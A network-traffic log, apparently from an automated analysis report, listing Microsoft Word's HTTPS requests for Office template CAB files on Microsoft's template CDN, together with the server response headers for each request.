X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 43653
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 2jOARYFw5gy+pyYC/dDZVQ==
Last-Modified: Fri, 22 Apr 2016 15:41:23 GMT
ETag: 0x8D36AC48EC98375
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d064db8e-b01e-0097-7097-a05ba0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0309043402.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 723359
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: dIpTxr3Vzpe9VKdsejNChg==
Last-Modified: Wed, 29 Aug 2018 18:14:30 GMT
ETag: 0x8D60DDB43B59EC5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3d093d5b-601e-0153-7197-a05713000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02835233.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 46413
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
Last-Modified: Fri, 22 Apr 2016 16:09:25 GMT
ETag: 0x8D36AC879BBB45C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 428c94d7-801e-0139-7097-a08f3b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851217.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 33610
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
ETag: 0x8D36AC499632D1A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 009251c0-b01e-0139-0e97-a03e98000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851216.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 34816
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: YoYxJM3NoTXswOcieCy4iA==
Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
ETag: 0x8D36AC8813CE0D3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 01a9fe93-e01e-0020-0397-a0f18d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851218.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31835
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC4998BC504
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 76eac56c-801e-00f9-0d97-a0f289000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851219.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31605
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
ETag: 0x8D36AC8822FFB6E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cb58b91a-201e-00f4-4797-a041dc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851220.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31482
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
ETag: 0x8D36AC8827914A7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f32060e3-b01e-0002-5297-a03492000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851222.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 28911
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: bXh7HiI9trkbaSOAYsyocg==
Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
ETag: 0x8D36AC8830E54C8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a51313b9-e01e-0100-5597-a07427000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp1000111502.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 230916
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: k/qfd5Ugqy0irE6oZLe7NA==
Last-Modified: Thu, 12 Jul 2018 00:23:53 GMT
ETag: 0x8D5E78DBFB34F04
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d4301c61-b01e-0122-6697-a0b138000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851221.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31562
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC499FED5FF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dacba60e-401e-0105-7097-a08a43000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328905.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 20457
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: TvpI7DB+ry+bNGoHPGf8+w==
Last-Modified: Fri, 22 Apr 2016 15:41:39 GMT
ETag: 0x8D36AC498BB27EF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3d2d7e33-b01e-0050-7d97-a02761000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851223.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 32833
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
ETag: 0x8D36AC88357BC32
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f320610a-b01e-0002-7697-a03492000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851224.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 30957
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 08kDbk4RWegysbTS6dQr8A==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883A171B7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 050425c3-601e-0131-1e97-a09534000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851225.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31008
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883F49D7D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 333d895c-301e-008a-7b97-a0d19b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851227.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31471
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: karb7EFxz6gpK2GEkvXvNA==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC8848A0495
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 13033484-101e-00ef-6b97-a07fdf000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp02851226.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 35519
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC88440C433
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2e8ae1bb-901e-00ce-4f97-a05ba4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0309043001.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 307348
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: DrxFqg5nzENdB0VDg3H5SA==
Last-Modified: Wed, 29 Aug 2018 18:20:24 GMT
ETag: 0x8D60DDC16D93762
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6b95f26a-601e-0143-7d97-a0927b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328893.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 20235
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 48ZBc7L0qnq3LhOWqVFL2A==
Last-Modified: Fri, 22 Apr 2016 15:41:57 GMT
ETag: 0x8D36AC4A3175138
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3d2d7caf-b01e-0050-2697-a02761000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03998158.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 42788
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IaS3txYxwszaX7umN1Hw0g==
Last-Modified: Fri, 22 Apr 2016 15:41:55 GMT
ETag: 0x8D36AC4A24B210A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: da46b32d-701e-0081-5997-a09a3e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328908.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31083
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iamBjmZY1zpztkJSL/hwHw==
Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
ETag: 0x8D36AC8865F4922
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 428ca131-801e-0139-0397-a08f3b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328884.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 22008
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: q78QzulIDkHYEnfpU4+Yyw==
Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
ETag: 0x8D36AC8987823BE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 45ea03cb-501e-000a-5e97-a02e9d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328916.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 26944
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: +RPdhJFXUwQthWzsTl2rpQ==
Last-Modified: Fri, 22 Apr 2016 16:09:47 GMT
ETag: 0x8D36AC886C4C4EE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 621faa23-601e-00ca-3c97-a0d6a3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
